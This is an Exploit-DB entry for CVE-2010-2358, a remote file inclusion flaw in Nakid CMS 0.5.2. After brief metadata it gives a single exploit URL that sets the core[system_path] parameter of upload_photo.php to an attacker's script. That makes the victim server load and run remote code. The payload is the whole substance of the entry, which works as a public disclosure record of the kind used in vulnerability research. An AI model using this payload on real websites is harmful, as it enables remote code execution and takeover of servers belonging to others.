Nakid CMS 0.5.2 - Remote File Inclusion Exploit

2010-06-16T00:00:00
ID EDB-ID:13889
Type exploitdb
Reporter sh00t0ut
Modified 2010-06-16T00:00:00

Description

Nakid CMS 0.5.2 Remote File Inclusion Exploit. CVE-2010-2358. Webapps exploit for php platform

                                        
                                            [~] Nakid CMS 0.5.2 Remote Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]